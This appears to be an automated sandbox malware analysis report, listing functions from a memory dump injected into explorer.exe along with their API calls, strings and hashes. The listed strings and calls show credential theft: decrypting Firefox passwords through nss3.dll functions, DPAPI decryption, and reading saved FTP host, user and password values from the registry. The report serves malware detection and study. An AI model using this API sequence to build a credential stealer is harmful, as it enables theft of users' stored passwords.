                                                                                                                                                      • API String ID: 231171946-1096842476
                                                                                                                                                      • Opcode ID: ba27e4f2a96411d9f0849277583d9e85eb78501a9d2a35972ac776997d36b5f8
                                                                                                                                                      • Instruction ID: ab45dab171e6e914e700a74d525221f81dbf5132feb18342ff8596a392d2a6e1
                                                                                                                                                      • Opcode Fuzzy Hash: ba27e4f2a96411d9f0849277583d9e85eb78501a9d2a35972ac776997d36b5f8
                                                                                                                                                      • Instruction Fuzzy Hash: 23C1E2709083459BDB348F28949076AB7E1BB8E31EF14096EECD587282E734DC8D8756
                                                                                                                                                      Function 00A06E6A Relevance: 16.7, APIs: 5, Strings: 4, Instructions: 955COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ,$-x0$Inf$NaN
                                                                                                                                                      • API String ID: 0-2346028406
                                                                                                                                                      • Opcode ID: c532d68bdd9bd8ebd15eea1ed55fbe1a769a1b1a665b1864aa2ff3a9213d7ffe
                                                                                                                                                      • Instruction ID: d844cc9726978a06caf6ce86dad09d5f721bbd8e9de6fdd62ec77ec0240a2b14
                                                                                                                                                      • Opcode Fuzzy Hash: c532d68bdd9bd8ebd15eea1ed55fbe1a769a1b1a665b1864aa2ff3a9213d7ffe
                                                                                                                                                      • Instruction Fuzzy Hash: 8B62F371E0C3868BD7268F28E49036EBFE1AF95344F28495DF4C2973D2D671AD458B82
                                                                                                                                                      Function 00A25F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A06AAA: memset.NTDLL ref: 00A06AC5
                                                                                                                                                      • memset.NTDLL ref: 00A25F53
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset
                                                                                                                                                      • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                                                                      • API String ID: 2221118986-594550510
                                                                                                                                                      • Opcode ID: 32027848600c4484cf7039fdf1328a8c2638a1a3fb7a40a12ef3cff625f7cfa4
                                                                                                                                                      • Instruction ID: 90aad96f6b992ed56637400fae42f8a7aa04136a7e4fdd7f192c87942611609e
                                                                                                                                                      • Opcode Fuzzy Hash: 32027848600c4484cf7039fdf1328a8c2638a1a3fb7a40a12ef3cff625f7cfa4
                                                                                                                                                      • Instruction Fuzzy Hash: 90C1B070A09711AFCB14DF28D580A6EB7E2BFC8704F14892DF89497281DB35ED56CB92
                                                                                                                                                      Function 00A02112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00A02127
                                                                                                                                                      • _alldiv.NTDLL(?,?,00989680,00000000), ref: 00A0213A
                                                                                                                                                      • wsprintfA.USER32 ref: 00A0214F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                                                                                                      • String ID: %li
                                                                                                                                                      • API String ID: 4120667308-1021419598
                                                                                                                                                      • Opcode ID: c44fd4c23b6fbac9a06bd209f084e106a845c806ee3ff4a3b3b39f53fe1f8fc8
                                                                                                                                                      • Instruction ID: ebdeeba3b39675d0417a3cbfefe164f40f737ccf4684161fb2d24f27c7fa5029
                                                                                                                                                      • Opcode Fuzzy Hash: c44fd4c23b6fbac9a06bd209f084e106a845c806ee3ff4a3b3b39f53fe1f8fc8
                                                                                                                                                      • Instruction Fuzzy Hash: 13E09232A4020877D7217BB89D06EEE7B6CFB40B17F404291F900A3182E5724A6583D5
                                                                                                                                                      Function 00A0123B Relevance: 4.5, APIs: 3, Instructions: 49encryptionstringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00A03E4B,00000000), ref: 00A0124A
                                                                                                                                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00A01268
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00A01295
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 117552131-0
                                                                                                                                                      • Opcode ID: 5f94672624c730bf633a04377660afb43325269ab53f0335e86cf320774e1376
                                                                                                                                                      • Instruction ID: 1b586b61fa5cc0f1fb72a8ab6fa2c24187c56e5b69b5d02a637d76f73e4a4f50
                                                                                                                                                      • Opcode Fuzzy Hash: 5f94672624c730bf633a04377660afb43325269ab53f0335e86cf320774e1376
                                                                                                                                                      • Instruction Fuzzy Hash: 9A014F71214305AFE718CF55DC89FBBB7ACFB84761F00462EF50186290EBA19C068660
                                                                                                                                                      Function 00A011E1 Relevance: 4.5, APIs: 3, Instructions: 46encryptionstringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(?,771AF360,00000000,?,00000000,?,00A046E3), ref: 00A011ED
                                                                                                                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A0120F
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A01231
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 117552131-0
                                                                                                                                                      • Opcode ID: 6e8f15fef1752dc186e2ca1950348f68e930a4844c73fb851fd85997f7ba70a5
                                                                                                                                                      • Instruction ID: ab8ec7e64014512941f2297e32e64f6554d85b1f470c3be3c59a65711412b203
                                                                                                                                                      • Opcode Fuzzy Hash: 6e8f15fef1752dc186e2ca1950348f68e930a4844c73fb851fd85997f7ba70a5
                                                                                                                                                      • Instruction Fuzzy Hash: CFF0627220430D7BE210DE96EC81FE77B9DEB95795F15002AB60183181DAA2ED0542B4
                                                                                                                                                      Function 00A01FCE Relevance: 3.0, APIs: 2, Instructions: 49encryptionCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A01FFA
                                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 00A02015
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CryptDataMemoryMoveUnprotect
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2807545630-0
                                                                                                                                                      • Opcode ID: 43c820208c9c23feeb6d4fa49e885ea6a97f95239a78caa66331326423079e2f
                                                                                                                                                      • Instruction ID: 92210e6758197402f7deceddc8a2cc1321761d8680dafa12941b13a78b8b7b66
                                                                                                                                                      • Opcode Fuzzy Hash: 43c820208c9c23feeb6d4fa49e885ea6a97f95239a78caa66331326423079e2f
                                                                                                                                                      • Instruction Fuzzy Hash: 32011E71A0131DABDB14DF9AEC849AFBBBCEF05350B10416AF905D3240D7719E00CBA0
                                                                                                                                                      Function 00A01198 Relevance: 3.0, APIs: 2, Instructions: 38encryptionCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 00A011B2
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?,?,?,00000001,00000000,?), ref: 00A011D2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BinaryCryptHeapString$AllocateProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3825993179-0
                                                                                                                                                      • Opcode ID: 20328e0aded97bdd1cae6fa515b827c614da696f4155c7357ec1844de188b76e
                                                                                                                                                      • Instruction ID: cbe6eac19c966175e700660e2114a77a49504feb7b50f1a45038960c62d32d8e
                                                                                                                                                      • Opcode Fuzzy Hash: 20328e0aded97bdd1cae6fa515b827c614da696f4155c7357ec1844de188b76e
                                                                                                                                                      • Instruction Fuzzy Hash: 12F0A73260021C77D724CA97DC84EEBFB6DDF857A1B100169F909D3180DA629D0583A0
                                                                                                                                                      Function 00A1B35C Relevance: 2.9, APIs: 2, Instructions: 383COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _alldiv_allmul
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 727729158-0
                                                                                                                                                      • Opcode ID: ca3869a87d2c5326e468f27a24948aa618f4f3a85e134a9c224fda4dd212a83c
                                                                                                                                                      • Instruction ID: 35357c8373e0f9e3da76d06b4a9fbca9044106feb17b06e66fc80ef37dfc0eb2
                                                                                                                                                      • Opcode Fuzzy Hash: ca3869a87d2c5326e468f27a24948aa618f4f3a85e134a9c224fda4dd212a83c
                                                                                                                                                      • Instruction Fuzzy Hash: 63D1AF71A157119FC724DF24C591AAEB3E2AFD8354F048A2CF8959B291DB70ECC1CB91
                                                                                                                                                      Function 00A1B97E Relevance: .4, Instructions: 382COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c7648b35ac1e83646f9ee4abfebd0824da7b616c06102dbf16eec9d6515e8735
                                                                                                                                                      • Instruction ID: a8b63fee636d711fa909940aea4e7b7069f0b150053913d4af55adbe9592f222
                                                                                                                                                      • Opcode Fuzzy Hash: c7648b35ac1e83646f9ee4abfebd0824da7b616c06102dbf16eec9d6515e8735
                                                                                                                                                      • Instruction Fuzzy Hash: 37C1CF7391868A4FDB104A3898412A9BFA3DFB6300F1C8A6DD4E58F7C3D42DDA46C359
                                                                                                                                                      Function 00A0C2F9 Relevance: .2, Instructions: 166COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                      • Opcode ID: 42cac66ebe1ff15dbe57e0d02516e2c732b3a03d5a38bc36668124b3a0d2d49c
                                                                                                                                                      • Instruction ID: 9c7ecaec02ae08c0d9927061ccf4ac87ef01019614a23fd3ed97bdc87a5a6733
                                                                                                                                                      • Opcode Fuzzy Hash: 42cac66ebe1ff15dbe57e0d02516e2c732b3a03d5a38bc36668124b3a0d2d49c
                                                                                                                                                      • Instruction Fuzzy Hash: 6D51E3726043088BC314EF24E99167AB2D6EBC8324F148B2DE8C6872D2DA35D8058642
                                                                                                                                                      Function 00A024B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                        • Part of subcall function 00A01090: lstrlenW.KERNEL32(?,?,00000000,00A017E5), ref: 00A01097
                                                                                                                                                        • Part of subcall function 00A01090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 00A010A8
                                                                                                                                                        • Part of subcall function 00A019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00A02CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00A019C4
                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00A02503
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00000000), ref: 00A0250A
                                                                                                                                                      • LoadLibraryW.KERNEL32(00000000), ref: 00A02563
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A02570
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00A02591
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 00A0259E
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 00A025AB
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 00A025B8
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 00A025C5
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 00A025D2
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 00A025DF
                                                                                                                                                        • Part of subcall function 00A0190B: lstrlen.KERNEL32(?,?,?,?,00000000,00A02783), ref: 00A0192B
                                                                                                                                                        • Part of subcall function 00A0190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00A02783), ref: 00A01930
                                                                                                                                                        • Part of subcall function 00A0190B: lstrcat.KERNEL32(00000000,?), ref: 00A01946
                                                                                                                                                        • Part of subcall function 00A0190B: lstrcat.KERNEL32(00000000,00000000), ref: 00A0194A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                                                                                      • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                                                                                      • API String ID: 3366569387-3272982511
                                                                                                                                                      • Opcode ID: b17563f457fea53dd9cd968990699284b6b70e9b7198b4b06c5ca8b3d3636626
                                                                                                                                                      • Instruction ID: 478edfe2bdc5cf82abb3a0714fdd43199051ffbda33661e9785e12cf7fdfd343
                                                                                                                                                      • Opcode Fuzzy Hash: b17563f457fea53dd9cd968990699284b6b70e9b7198b4b06c5ca8b3d3636626
                                                                                                                                                      • Instruction Fuzzy Hash: C4411831A003199BCB14EFB57D586AE7EF9EB85742B48042FE841932D1EBB68C068B51
                                                                                                                                                      Function 00A05E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A05BF5: memset.NTDLL ref: 00A05C07
                                                                                                                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 00A060E1
                                                                                                                                                      • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 00A060EC
                                                                                                                                                      • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 00A06113
                                                                                                                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 00A0618E
                                                                                                                                                      • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 00A061B5
                                                                                                                                                      • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 00A061C1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _alldiv$_allrem$memset
                                                                                                                                                      • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                                                                      • API String ID: 2557048445-1989508764
                                                                                                                                                      • Opcode ID: d1eb123b8858ebdeab6ad4fb4c62cfd1988a4cbeb2fd79e7dc1139971dda8c10
                                                                                                                                                      • Instruction ID: d1ef19ba1843100959e6117b5b3889d7a07e015f8bd2c6a039814565a96ec0be
                                                                                                                                                      • Opcode Fuzzy Hash: d1eb123b8858ebdeab6ad4fb4c62cfd1988a4cbeb2fd79e7dc1139971dda8c10
                                                                                                                                                      • Instruction Fuzzy Hash: 18B18DB1D0874AABD7259F34FD85B3B7BD4FB84308F240A59F882A61D1E630DD348A91
                                                                                                                                                      Function 00A1D2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • memcmp.NTDLL(00A5637A,BINARY,00000007), ref: 00A1D324
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcmp
                                                                                                                                                      • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                                                      • API String ID: 1475443563-3683840195
                                                                                                                                                      • Opcode ID: 6b1f3aae45206fe2a4765db579c95e6a192fb9d0e19551c337328488d1b0190a
                                                                                                                                                      • Instruction ID: 874f77fe620041725b010f5c9427fae2947071b3233bceacf381d08c11c2ed18
                                                                                                                                                      • Opcode Fuzzy Hash: 6b1f3aae45206fe2a4765db579c95e6a192fb9d0e19551c337328488d1b0190a
                                                                                                                                                      • Instruction Fuzzy Hash: F451F431908704ABC710DF64DC41AAAB7B6BF45301F144C69FDA2AB181E774FD49CBA2
                                                                                                                                                      Function 00A048B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A1E
                                                                                                                                                        • Part of subcall function 00A019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A3C
                                                                                                                                                        • Part of subcall function 00A019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A75
                                                                                                                                                        • Part of subcall function 00A019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A98
                                                                                                                                                        • Part of subcall function 00A0482C: lstrlenW.KERNEL32(?), ref: 00A04845
                                                                                                                                                        • Part of subcall function 00A0482C: lstrlenW.KERNEL32(?), ref: 00A0488F
                                                                                                                                                        • Part of subcall function 00A0482C: lstrlenW.KERNEL32(?), ref: 00A04897
                                                                                                                                                      • wsprintfW.USER32 ref: 00A049A7
                                                                                                                                                      • wsprintfW.USER32 ref: 00A049B9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                                                                      • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                                                                      • API String ID: 2889301010-4273187114
                                                                                                                                                      • Opcode ID: 1fe45f4a9e8d42fdc65ca94144345951341d8b79483719afe9b2c6d610025109
                                                                                                                                                      • Instruction ID: 92e67fc7fa5400ae4aebd204939d12d93a50e445a650c1b4e5be4aadbdf023ff
                                                                                                                                                      • Opcode Fuzzy Hash: 1fe45f4a9e8d42fdc65ca94144345951341d8b79483719afe9b2c6d610025109
                                                                                                                                                      • Instruction Fuzzy Hash: B131F4A1B0430C6BC720AB66ED51D2BB6EDFFC97C8B05492DF545832C1DAB2DC0587A1
                                                                                                                                                      Function 00A0F92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.NTDLL(?,?,?,?,00000000), ref: 00A0FB32
                                                                                                                                                      • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 00A0FB4D
                                                                                                                                                      • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 00A0FB60
                                                                                                                                                      • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 00A0FB95
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy
                                                                                                                                                      • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                      • API String ID: 3510742995-3408036318
                                                                                                                                                      • Opcode ID: d434b85ada1b5fcc0aa006b142c36a97bda7063947a57b2f641d86282e55487e
                                                                                                                                                      • Instruction ID: 0f51e3c181637ec5c70e864a5e48e82db9e6018887c6a1bd90fd01dd55c2e21b
                                                                                                                                                      • Opcode Fuzzy Hash: d434b85ada1b5fcc0aa006b142c36a97bda7063947a57b2f641d86282e55487e
                                                                                                                                                      • Instruction Fuzzy Hash: AFD1E1B1A083458FDB24DF28D881B1ABBE1AF95314F08457DFC989B382EB75D805CB52
                                                                                                                                                      Function 00A07820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: %$-x0$NaN
                                                                                                                                                      • API String ID: 0-62881354
                                                                                                                                                      • Opcode ID: 6b17b2720a08fe6450e12a66e0fd65ef2869b13936234de31af1ba6ac8d19489
                                                                                                                                                      • Instruction ID: 2fc5845bee582eb9e95640a4de05fbf7c52263e8ab877a03748006e1ed731fea
                                                                                                                                                      • Opcode Fuzzy Hash: 6b17b2720a08fe6450e12a66e0fd65ef2869b13936234de31af1ba6ac8d19489
                                                                                                                                                      • Instruction Fuzzy Hash: 5AD1E470E0C39A8FD7258F28A49036EBBE1AF99308F24495DF8C2872D1D670E945D792
                                                                                                                                                      Function 00A078B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: -x0$NaN
                                                                                                                                                      • API String ID: 0-3447725786
                                                                                                                                                      • Opcode ID: ee5e512dd3fbd70a7cedbf569949a71f0fb94d255d2d5670056d516fe507674f
                                                                                                                                                      • Instruction ID: fd3444ec83fd2b9d71d3ced33a9425ec397228ebffa1cefb3fc8fb4d04b3cd53
                                                                                                                                                      • Opcode Fuzzy Hash: ee5e512dd3fbd70a7cedbf569949a71f0fb94d255d2d5670056d516fe507674f
                                                                                                                                                      • Instruction Fuzzy Hash: 51E1E330E0C39A8FD7258F28E49036EBBE1AF99348F24495DE8C2872D1D670ED45D792
                                                                                                                                                      Function 00A07A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: -x0$NaN
                                                                                                                                                      • API String ID: 0-3447725786
                                                                                                                                                      • Opcode ID: b43b00130ed8dc4f00090e399434213a0aea3b94890fbf07f986d4154bdb11de
